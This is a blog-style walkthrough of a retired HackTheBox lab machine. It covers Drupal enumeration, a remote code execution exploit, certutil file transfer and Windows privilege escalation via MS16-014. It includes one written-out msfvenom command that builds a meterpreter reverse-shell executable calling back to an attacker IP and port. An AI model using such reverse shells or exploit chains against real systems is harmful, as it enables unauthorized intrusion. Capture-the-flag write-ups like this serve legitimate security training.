The other day, a friend asked if I was on HacktheBox and I was reminded that I'd been absent for a while.  Apparently, they are cranking out a new box every week which could be good or bad -- I'm not really sure.  While looking for something to write, I thought I'd take on one of their retired boxes and that would solve two "needs" simultaneously.  

This box was interesting mostly because of the hunt for the exploit to gain a foothold on the system.  From there, it was trial and error as to which technique would work for a particular task.  After that, root was easy.

First, we kick off with Nmap:





Right off the bat, we see that we're running Windows / IIS and we're running Drupal. 

We check out the Drupal site:





We get the Drupal version:





We run Droopescan:





We search through Searchsploit:





We find a vulnerability in Services with an exploit which does not work.  I tried troubleshooting the issue but no such luck.  I then go hunting the web and I find:





Let's see if we can get a simple "whoami":





Excellent! 


Next, let's check out the architecture:





We need a reverse shell:

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=10.10.14.4 LPORT=443 -f exe >> mshell443.exe





I realize I have a shell with that name and I rename my shell to bastard.exe

After some trial and error with downloading the file, certutil proves to be the winner.  

We move the shell to our victim:





We check the directory as a sanity check.  I should also point out that I created that directory earlier. 

We execute our shell:





With our handler setup:





We catch the inbound connection:





We move to Exploit Suggester:





For some reason, ms16-075 does not work.  I move to ms16-014:





And... we're root!